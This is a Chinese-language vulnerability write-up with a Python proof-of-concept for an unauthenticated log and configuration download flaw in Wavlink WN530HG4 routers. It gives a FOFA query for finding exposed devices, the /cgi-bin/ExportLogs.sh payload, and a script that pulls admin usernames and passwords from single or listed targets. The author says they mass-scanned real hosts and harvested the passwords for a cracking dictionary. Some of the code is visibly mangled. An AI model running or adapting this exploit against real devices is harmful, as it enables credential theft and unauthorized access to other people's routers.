51工具盒子漏洞说明
Wavlink WN530HG4 M30HG4.V5030.191116中存在访问控制问题,未经验证的攻击者可以下载日志文件和配置数据。
影响版本
Wavlink WN530HG4 M30HG4.V5030.191116
漏洞复现
fofa:title="Wi-Fi APP Login"
payload:/cgi-bin/ExportLogs.sh
POC
#!/usr/bin/env python
# -*- conding:utf-8 -*-
import requests
import argparse
import sys
import re
import urllib3
urllib3.disable_warnings()
def title():
print("""
*** ** * ** ***
/ **\|\\ \\ / /\| ****\| \|** \\ / _ \\ \|** \\ \|** \\ \|_ \\ \| \|\| \| / _ \\ \| \|\| \| / _ \\
\| \| \\ \\ / / \| \|__ ______ ) \|\| \| \| \| ) \| ) \| ______ *) \|\| \|\| \|* \| \| \| \|\| \|\| \| \| () \|
\| \| \\ / / \| **\| \|****\| / / \| \| \| \| / / / / \|____**\| \|** \< \|** *\|\| \| \| \|\|* \| _, \|
\| \|____ \\ / \| \|____ / /_ \| \|\| \| / / / /_ __) \| \| \| \| \|\| \| \| \| / /
_**\| / \|** ****\| \|****\| _/ \|**\|\|**\| \|***/ \|*\| _**/ \|\| /_/
Author:Henry4E36
""")
class information(object):
def init(self,args):
self.args = args
self.url = args.url
self.file = args.file
def target_url(self):
target_url = self.url + "/cgi-bin/ExportLogs.sh"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
}
try:
res = requests.get(url=target_url, headers=headers, verify=False, timeout=5)
if res.status_code == 200 and "Login" in res.text and "Password" in res.text:
print(f"\033[31m[{chr(8730)}] 目标系统: {self.url} 存在Wavlink 导出日志配置未授权访问下载漏洞\033[0m")
pattern1 = re.compile(r"Login=(.*)")
pattern2 = re.compile(r"Password=(.*)")
username = pattern1.findall(res.text)[0]
password = pattern2.findall(res.text)[0]
print(f"\033[31m[{chr(8730)}] 用户名: {username} 密码:{password}\033[0m")
print("[" + "-"*100 + "]")
else:
print(f"[\033[31mx\033[0m] 目标系统: {self.url} 不存在Wavlink 导出日志配置未授权访问下载漏洞")
print("[" + "-"*100 + "]")
except Exception as e:
print("[\033[31mX\033[0m] 连接错误!")
print("[" + "-"*100 + "]")
def file_url(self):
with open(self.file, "r") as urls:
for url in urls:
url = url.strip()
if url[:4] != "http":
url = "http://" + url
self.url = url.strip()
information.target_url(self)
if name == "main":
title()
parser = ar=argparse.ArgumentParser(description=' Wavlink 导出日志配置未授权访问下载')
parser.add_argument("-u", "--url", type=str, metavar="url", help="Target url eg:"http://127.0.0.1"")
parser.add_argument("-f", "--file", metavar="file", help="Targets in file eg:"ip.txt"")
args = parser.parse_args()
if len(sys.argv) != 3:
print(
"\[-\] 参数错误!\\neg1:\>\>\>python3 CVE-2022-34049.py -u http://127.0.0.1\\neg2:\>\>\>python3 CVE-2022-34049.py -f ip.txt")
elif args.url:
information(args).target_url()
elif args.file:
information(args).file_url()
利用fofa搜集的数据,批量跑了一下数据,把password字段收集下来,可以补充到字典里去。
